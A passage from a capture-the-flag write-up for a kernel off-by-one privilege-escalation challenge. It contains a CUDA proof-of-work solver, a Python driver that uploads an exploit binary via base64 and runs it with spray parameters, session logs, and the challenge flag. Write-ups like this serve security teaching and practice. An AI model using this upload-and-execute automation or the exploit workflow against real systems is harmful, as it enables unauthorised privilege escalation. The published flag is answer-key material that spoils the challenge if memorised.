    cudaMalloc((void**)&d_prefix, prefix_len + 1);
    cudaMemcpy(d_prefix, host_prefix, prefix_len + 1, cudaMemcpyHostToDevice);

    uint64_t *d_found_counter;
    int *d_success_flag;
    cudaMalloc(&d_found_counter, sizeof(uint64_t));
    cudaMalloc(&d_success_flag, sizeof(int));

    int initial_flag = 0;
    cudaMemcpy(d_success_flag, &initial_flag, sizeof(int), cudaMemcpyHostToDevice);

    int threadsPerBlock = 1024;
    int blocksPerGrid = 65535;
    uint64_t offset = 0;
    int loops = 0;

    // Launch until some thread reports success; each launch covers a new counter range.
    while(initial_flag == 0) {
        hashcash_kernel<<<blocksPerGrid, threadsPerBlock>>>(
            bits, d_prefix, prefix_len, d_found_counter, d_success_flag, offset);

        cudaError_t err = cudaGetLastError();
        if (err != cudaSuccess) {
            printf("[-] FATAL GPU ERROR: %s\n", cudaGetErrorString(err));
            return 1;
        }

        cudaDeviceSynchronize();
        cudaMemcpy(&initial_flag, d_success_flag, sizeof(int), cudaMemcpyDeviceToHost);
        offset += ((uint64_t)blocksPerGrid * threadsPerBlock);
        loops++;

        if (loops % 10 == 0) {
            printf("[GPU] Checked %llu million hashes...\n",
                   (unsigned long long)(offset / 1000000));
            fflush(stdout);
        }
    }

    uint64_t result_counter;
    cudaMemcpy(&result_counter, d_found_counter, sizeof(uint64_t), cudaMemcpyDeviceToHost);

    printf("\n[SUCCESS] %s%llx\n", host_prefix, (unsigned long long)result_counter);

    cudaFree(d_prefix);
    cudaFree(d_found_counter);
    cudaFree(d_success_flag);
    return 0;
}
"""

with open("cuda_solver.cu", "w") as f:
    f.write(CUDA_SOLVER_CODE)

print("Compiling CUDA solver with nvcc...")
result = subprocess.run(["nvcc", "-O3", "cuda_solver.cu", "-o", "cuda_pow_solver"],
                       capture_output=True, text=True)
if result.returncode != 0:
    print(f"Compilation failed:\n{result.stderr}")
    sys.exit(1)

print("CUDA Solver compiled successfully!")
print()

# ==========================================
# STEP 3: Run the Solver
# ==========================================
print("Running GPU solver...")
print("=" * 70)

process = subprocess.Popen(
    ["./cuda_pow_solver", bits, token],
    stdout=subprocess.PIPE,
    stderr=subprocess.STDOUT,
    text=True
)

stamp_result = None
for line in process.stdout:
    print(line, end="", flush=True)
    if line.startswith("[SUCCESS]"):
        stamp_result = line.replace("[SUCCESS]", "").strip()

process.wait()

print("=" * 70)
print()

if stamp_result:
    print("POW SOLVED!")
    print()
    print("COPY THIS STAMP AND PASTE IT IN YOUR LOCAL TERMINAL:")
    print()
    print("=" * 70)
    print(stamp_result)
    print("=" * 70)
    print()
else:
    print("Failed to find valid stamp")
    sys.exit(1)

5. Remote Solver Script (`remote_manual_pow.py`)

This is the script used during the solve. It:

Asks the user to enter the port number (changes each session)
Displays the PoW challenge for the user to copy to Google Colab
Waits for the user to paste the solved stamp back

Once the stamp is accepted and the VM has booted to a shell prompt, it uploads the compiled exploit via base64, runs each parameter tuple in turn, and checks the output for the flag.
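The upload step is the part most likely to go wrong over a raw socket, so here is a standalone Python sketch of it that can be tested offline. It builds the same kind of heredoc payload as the script, but chunks the base64 text with plain slicing instead of `textwrap.fill`; `build_upload_commands` and `recover_payload` are illustrative names, not functions from the solver.

```python
import base64


def build_upload_commands(raw: bytes, remote_path: str = "/tmp/e", width: int = 512):
    """Return (heredoc, decode_command) for pushing a binary through a shell."""
    b64 = base64.b64encode(raw).decode()
    # Fixed-width lines keep each line well below typical tty line limits.
    lines = [b64[i:i + width] for i in range(0, len(b64), width)]
    heredoc = f"cat > {remote_path}.b64 <<'EOF'\n" + "\n".join(lines) + "\nEOF\n"
    decode = (
        f"base64 -d {remote_path}.b64 > {remote_path} "
        f"&& chmod +x {remote_path} && rm -f {remote_path}.b64"
    )
    return heredoc, decode


def recover_payload(heredoc: str) -> bytes:
    """Local stand-in for the remote `base64 -d`: strip the wrapper and decode."""
    body_lines = heredoc.splitlines()[1:-1]
    return base64.b64decode("".join(body_lines))


if __name__ == "__main__":
    sample = bytes(range(256)) * 8  # stand-in for the compiled exploit
    heredoc, decode = build_upload_commands(sample)
    print(decode)
    print("round trip ok:", recover_payload(heredoc) == sample)
```

Quoting the heredoc delimiter ('EOF') stops the remote shell from expanding anything inside the payload, which matters because base64 output can contain `/` and `+` but never the delimiter itself.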

1
import base64
2
import os
3
import re
4
import select
5
import socket
6
import sys
7
import textwrap
8
import time
9

10
PROMPTS = [b"~ $ ", b"/ # ", b"# "]
11
FLAG_RE = re.compile(rb"VBD\{[^}\r\n]+\}")
12

13

14
def has_prompt(buf: bytes) -> bool:
15
    return any(p in buf for p in PROMPTS)
16

17

18
def recv_until(sock: socket.socket, timeout: float, *, want_prompt=False):
19
    deadline = time.time() + timeout
20
    buf = b""
21
    while time.time() < deadline:
22
        r, _, _ = select.select([sock], [], [], 0.25)
23
        if not r:
24
            continue
25
        chunk = sock.recv(4096)
26
        if not chunk:
27
            return buf, "eof"
28
        buf += chunk
29

30
        if FLAG_RE.search(buf):
31
            return buf, "flag"
32
        if b"Wrong Proof of Work" in buf:
33
            return buf, "pow_wrong"
34
        if b"Failed to get \"write\" lock" in buf:
35
            return buf, "busy"
36
        if b"gdbstub: couldn't create chardev" in buf:
37
            return buf, "busy"
38
        if b"Kernel panic" in buf:
39
            return buf, "panic"
40
        if want_prompt and has_prompt(buf):
41
            return buf, "prompt"
42

43
    return buf, "timeout"
44

45

46
def read_pow_line(sock: socket.socket, timeout: float):
47
    deadline = time.time() + timeout
48
    buf = b""
49
    while time.time() < deadline:
50
        r, _, _ = select.select([sock], [], [], 0.25)
51
        if not r:
52
            continue
53
        chunk = sock.recv(4096)
54
        if not chunk:
55
            break
56
        buf += chunk
57
        if b"\n" in buf:
58
            line = buf.split(b"\n", 1)[0].decode(errors="ignore").strip()
59
            return line
60
    return ""
61

62

63
def connect_and_pow(host: str, port: int):
64
    sock = socket.create_connection((host, port), timeout=10)
65
    sock.setblocking(False)
66

67
    line = read_pow_line(sock, timeout=20)
68
    if not line:
69
        sock.close()
70
        raise RuntimeError("failed to read PoW line")
71

72
    m = re.search(r"hashcash -mb(\d+)\s+(\S+)", line)
73
    if not m:
74
        sock.close()
75
        raise RuntimeError(f"unexpected banner: {line!r}")
76

77
    bits = int(m.group(1))
78
    resource = m.group(2)
79
    print(f"[pow] bits={bits} resource={resource}")
80
    print(f"[pow] challenge: {line}")
81
    print()
82
    print(">>> Solve this in Google Colab, then paste the stamp below <<<")
83
    print()
84
    stamp = input("Stamp: ").strip()
85
    if not stamp:
86
        sock.close()
87
        raise RuntimeError("empty stamp")
88

89
    sock.sendall((stamp + "\n").encode())
90

91
    boot, state = recv_until(sock, 240, want_prompt=True)
92
    if state == "pow_wrong":
93
        sock.close()
94
        raise RuntimeError("PoW rejected")
95
    if state == "busy":
96
        sock.close()
97
        raise RuntimeError("remote busy (qemu lock)")
98
    if state in ("prompt", "flag"):
99
        return sock, boot
100

101
    sock.close()
102
    raise RuntimeError(f"failed to reach prompt (state={state})")
103

104

105
def send_line(sock: socket.socket, line: str):
106
    sock.sendall(line.encode() + b"\n")
107

108

109
def upload_exploit(sock: socket.socket, local_path: str):
110
    raw = open(local_path, "rb").read()
111
    b64 = base64.b64encode(raw).decode()
112
    wrapped = textwrap.fill(b64, width=512)
113

114
    payload = "cat > /tmp/e.b64 <<'EOF'\n" + wrapped + "\nEOF\n"
115
    sock.sendall(payload.encode())
116
    out, state = recv_until(sock, 120, want_prompt=True)
117
    if state != "prompt":
118
        return out, state
119

120
    send_line(sock, "base64 -d /tmp/e.b64 > /tmp/e && chmod +x /tmp/e && rm -f /tmp/e.b64")
121
    out2, state2 = recv_until(sock, 60, want_prompt=True)
122
    return out + out2, state2
123

124

125
def attempt_on_connection(sock: socket.socket, tuples, max_attempts: int):
    all_out = b""
    for i in range(max_attempts):
        # Cycle through the parameter tuples, one per attempt.
        tpl = tuples[i % len(tuples)]
        cmd = f"/tmp/e {tpl}"
        print(f"[try] attempt={i+1} cmd={cmd}")
        send_line(sock, cmd)
        out, state = recv_until(sock, 40, want_prompt=True)
        all_out += out

        m = FLAG_RE.search(all_out)
        if m:
            return all_out, "flag", m.group(0).decode(errors="ignore")

        # Any of these states ends the session, so stop and report it.
        if state in ("panic", "eof", "busy", "pow_wrong", "timeout"):
            return all_out, state, ""

    return all_out, "attempts_done", ""


def main():
    host = "ctf.vulnbydefault.com"
    bin_path = "exploit"

    port_str = input("Enter port number: ").strip()
    if not port_str:
        print("port is required")
        return 1
    try:
        port = int(port_str)
    except ValueError:
        print(f"invalid port: {port_str}")
        return 1

    tuples = [
        "0x04 220 10 900 3 2000 6 20",
        "0x04 220 6 900 3 2500 6 20",
        "0x04 220 6 900 3 2000 6 20",
        "0x04 220 8 900 3 2000 6 20",
    ]

    if not os.path.exists(bin_path):
        print(f"binary not found: {bin_path}")
        return 1

    print(f"[conn] connecting to {host}:{port}")
    sock = None
    try:
        sock, boot = connect_and_pow(host, port)
        m0 = FLAG_RE.search(boot)
        if m0:
            print(m0.group(0).decode(errors="ignore"))
            return 0

        up_out, up_state = upload_exploit(sock, bin_path)
        m1 = FLAG_RE.search(up_out)
        if m1:
            print(m1.group(0).decode(errors="ignore"))
            return 0
        if up_state != "prompt":
            print(f"[conn] upload failed state={up_state}")
            return 1

        out, state, flag = attempt_on_connection(sock, tuples, len(tuples))
        if flag:
            print(f"[+] FLAG {flag}")
            return 0

        print(f"[conn] ended state={state}")
        if state == "attempts_done":
            try:
                send_line(sock, "exit")
                recv_until(sock, 20, want_prompt=False)
            except Exception:
                pass

    except Exception as e:
        print(f"[conn] error: {e}")
    finally:
        if sock is not None:
            try:
                sock.close()
            except Exception:
                pass

    print("[-] no flag")
    return 1


if __name__ == "__main__":
    raise SystemExit(main())

6. Solve Workflow (Step by Step)

Prerequisites

Save the embedded C source above as exploit.c
Compile it to a local binary named exploit
Enable a GPU runtime in a Google Colab notebook
Paste colab gpu.py into a Colab code cell

Compile command:

gcc -O2 -o exploit exploit.c

Step 1: Start the Remote Solver

cd feedback/
python3 remote_manual_pow.py

The script asks for the session port, connects, and prints the PoW challenge:

Enter port number: 12625
[conn] connecting to ctf.vulnbydefault.com:12625
[pow] bits=32 resource=avvDFOzS64YNPLqO
[pow] challenge: Send the output of: hashcash -mb32 avvDFOzS64YNPLqO

>>> Solve this in Google Colab, then paste the stamp below <<<

Stamp:
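The `bits` and `resource` fields in that output come from the challenge line. As a rough, independent sketch (not the script's own parser), they could be extracted with a regular expression. The pattern below assumes the challenge always has the form shown in this session, and `parse_pow_challenge` is a hypothetical helper name.

```python
import re

# Assumed format, taken from the session output in this writeup:
#   "Send the output of: hashcash -mb32 <token>"
CHALLENGE_RE = re.compile(r"hashcash\s+-mb(\d+)\s+(\S+)")


def parse_pow_challenge(line: str):
    """Return (bits, resource) from a challenge line, or None if it does not match."""
    m = CHALLENGE_RE.search(line)
    if m is None:
        return None
    return int(m.group(1)), m.group(2)


if __name__ == "__main__":
    line = "Send the output of: hashcash -mb32 avvDFOzS64YNPLqO"
    print(parse_pow_challenge(line))
```

Returning `None` on a mismatch lets the caller treat an unexpected banner as an error instead of submitting a stamp for the wrong resource.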

Step 2: Solve PoW in Google Colab

Run the Colab cell. When prompted, paste the challenge:

POW Challenge: hashcash -mb32 avvDFOzS64YNPLqO

The GPU solver finds the stamp in seconds:

[SUCCESS] 1:32:260305:avvDFOzS64YNPLqO::gX9574:880dd763
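To put "seconds" in context, a back-of-the-envelope estimate helps: each candidate stamp has a 2^-32 chance of hashing to 32 leading zero bits, so the expected work is about 2^32 SHA-1 evaluations. The hash rates in this sketch are illustrative assumptions, not measurements from this solve.

```python
def expected_hashes(bits: int) -> int:
    """Expected number of SHA-1 evaluations to find `bits` leading zero bits."""
    return 2 ** bits


def expected_seconds(bits: int, hashes_per_second: float) -> float:
    """Expected solve time at a given (assumed) hash rate."""
    return expected_hashes(bits) / hashes_per_second


if __name__ == "__main__":
    # Illustrative rates only; real throughput depends on hardware and solver.
    assumed_rates = {"single CPU core": 1e7, "GPU": 2e9}
    for name, rate in assumed_rates.items():
        secs = expected_seconds(32, rate)
        print(f"{name}: ~{secs:.1f} s for a 32-bit stamp")
```

Because the search is memoryless, the actual time for any one challenge can be noticeably shorter or longer than this average.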

Step 3: Paste Stamp Back

Copy the stamp from Colab and paste it back in the local terminal:

Stamp: 1:32:260305:avvDFOzS64YNPLqO::gX9574:880dd763
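Since a rejected stamp costs a whole session, it can be worth checking the stamp locally before pasting it. The sketch below assumes the standard hashcash version 1 layout (`ver:bits:date:resource:ext:rand:counter`) and that validity means the SHA-1 of the full stamp string has at least `bits` leading zero bits. The function names are hypothetical and are not part of `remote_manual_pow.py`.

```python
import hashlib


def leading_zero_bits(digest: bytes) -> int:
    """Count the zero bits before the first set bit of a digest."""
    count = 0
    for byte in digest:
        if byte == 0:
            count += 8
            continue
        # bit_length() is the position of the highest set bit within the byte.
        count += 8 - byte.bit_length()
        break
    return count


def stamp_is_valid(stamp: str, resource: str, bits: int) -> bool:
    """Check field layout, resource, claimed bits, and the SHA-1 prefix."""
    fields = stamp.split(":")
    if len(fields) != 7 or fields[0] != "1":
        return False
    if not fields[1].isdigit() or int(fields[1]) < bits:
        return False
    if fields[3] != resource:
        return False
    digest = hashlib.sha1(stamp.encode()).digest()
    return leading_zero_bits(digest) >= bits


if __name__ == "__main__":
    stamp = input("Stamp: ").strip()
    resource = input("Resource: ").strip()
    print("valid" if stamp_is_valid(stamp, resource, 32) else "invalid")
```

The check is a single hash, so it adds no meaningful delay before submitting.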

Step 4: Exploit Runs Automatically

The script uploads the exploit binary as base64, decodes it on the remote VM, and runs it with each parameter tuple in turn until the flag appears:

[try] attempt=1 cmd=/tmp/e 0x04 220 10 900 3 2000 6 20
[+] FLAG VBD{On3_byt3_a_dr3am_w0rk1ng_w1th_p1p3s_316dbee3615588c7efe25ee55cd3c281}
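The upload step depends on the wrapped base64 text decoding back to the exact binary. The sketch below rebuilds the same heredoc payload locally and confirms the round trip. `build_upload` and `decode_like_remote` are hypothetical helpers. Comparing the returned digest against `sha256sum /tmp/e` on the VM is an assumption, since the minimal image may not ship that tool.

```python
import base64
import hashlib
import textwrap


def build_upload(raw: bytes, remote_b64: str = "/tmp/e.b64", width: int = 512):
    """Return the heredoc payload and the SHA-256 of the original bytes."""
    b64 = base64.b64encode(raw).decode()
    # Base64 has no spaces, so fill() simply cuts it into width-sized lines.
    wrapped = textwrap.fill(b64, width=width)
    heredoc = f"cat > {remote_b64} <<'EOF'\n{wrapped}\nEOF\n"
    return heredoc, hashlib.sha256(raw).hexdigest()


def decode_like_remote(heredoc: str) -> bytes:
    """Simulate `base64 -d` on the heredoc body (newlines are ignored)."""
    # Drop the leading `cat` line and the trailing "EOF" plus empty string.
    body = heredoc.split("\n")[1:-2]
    return base64.b64decode("".join(body))


if __name__ == "__main__":
    sample = bytes(range(256)) * 8
    payload, digest = build_upload(sample)
    assert decode_like_remote(payload) == sample
    print("round trip ok, sha256 =", digest)
```

Keeping each line at 512 characters or fewer is the same choice the solver script makes; very long single lines can be truncated by terminal line buffering.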

7. Full Solve Session Log

Enter port number: 12625
[conn] connecting to ctf.vulnbydefault.com:12625
[pow] bits=32 resource=avvDFOzS64YNPLqO
[pow] challenge: Send the output of: hashcash -mb32 avvDFOzS64YNPLqO

>>> Solve this in Google Colab, then paste the stamp below <<<

Stamp: 1:32:260305:avvDFOzS64YNPLqO::gX9574:880dd763
[try] attempt=1 cmd=/tmp/e 0x04 220 10 900 3 2000 6 20
[+] FLAG VBD{On3_byt3_a_dr3am_w0rk1ng_w1th_p1p3s_316dbee3615588c7efe25ee55cd3c281}

Failed Attempts Before Success

Attempt 1 (port 7239): The exploit ran but timed out because it missed the race window.

[try] attempt=1 cmd=/tmp/e 0x04 220 10 900 3 2000 6 20
[conn] ended state=timeout
[-] no flag

Attempt 2 (port 7239): QEMU lock contention, because another instance was still running.

[conn] error: remote busy (qemu lock)
[-] no flag

Attempt 3 (port 12625): The first parameter tuple succeeded on a fresh port.

[+] FLAG VBD{On3_byt3_a_dr3am_w0rk1ng_w1th_p1p3s_316dbee3615588c7efe25ee55cd3c281}

8. Key Takeaways

Off-by-one matters. A single-byte overflow in the kernel heap is enough for full privilege escalation when combined with the right slab spray technique.
The exploit is probabilistic. It relies on timing-sensitive races between cred allocation, the overflow, and the spray. Not every attempt succeeds, and retrying on a fresh port is often necessary.
GPU acceleration is practical for PoW. A 32-bit hashcash challenge that would take minutes on a CPU is solved in seconds on a Google Colab T4 GPU using a custom CUDA kernel.
Possible outcome states:
- FLAG VBD{...} - exploit succeeded, flag captured
- timeout - exploit missed the race window
- remote busy (qemu lock) - another QEMU instance holds the lock
- panic - kernel crash during the exploit attempt
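The outcome states above suggest a simple retry policy. The following is a minimal sketch, assuming each state maps to one follow-up action. The action names, `next_step`, and `run_until_flag` are hypothetical and not part of the solver script, and `run_session` stands in for one full connection (new port, new PoW, upload, attempts).

```python
# State names come from the solver script; the actions are assumptions.
NEXT_STEP = {
    "flag": "stop",
    "timeout": "reconnect",
    "busy": "wait_then_reconnect",
    "panic": "reconnect",
    "eof": "reconnect",
    "pow_wrong": "resolve_pow",
    "attempts_done": "reconnect",
}


def next_step(state: str) -> str:
    """Map a session outcome to a follow-up action; unknown states abort."""
    return NEXT_STEP.get(state, "abort")


def run_until_flag(run_session, max_sessions: int = 5):
    """Call run_session() -> (state, flag) until a flag appears or we give up.

    Returns (flag or None, number of sessions used).
    """
    used = 0
    for _ in range(max_sessions):
        used += 1
        state, flag = run_session()
        action = next_step(state)
        if action == "stop":
            return flag, used
        if action == "abort":
            break
    return None, used


if __name__ == "__main__":
    # Fake sessions mirroring the failed attempts described in this writeup.
    outcomes = iter([("timeout", ""), ("busy", ""), ("flag", "VBD{example}")])
    print(run_until_flag(lambda: next(outcomes)))
```

In practice every new session needs a fresh port and a newly solved PoW, so the loop would pause for manual input between sessions.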

9. Files Used

File	Purpose
Embedded exploit source code in this writeup	Kernel exploit source and build input
`exploit` (compiled locally)	Binary uploaded to remote VM
`remote_manual_pow.py`	Remote solver with manual PoW
`colab gpu.py`	CUDA hashcash solver for Google Colab

Flag

VBD{On3_byt3_a_dr3am_w0rk1ng_w1th_p1p3s_316dbee3615588c7efe25ee55cd3c281}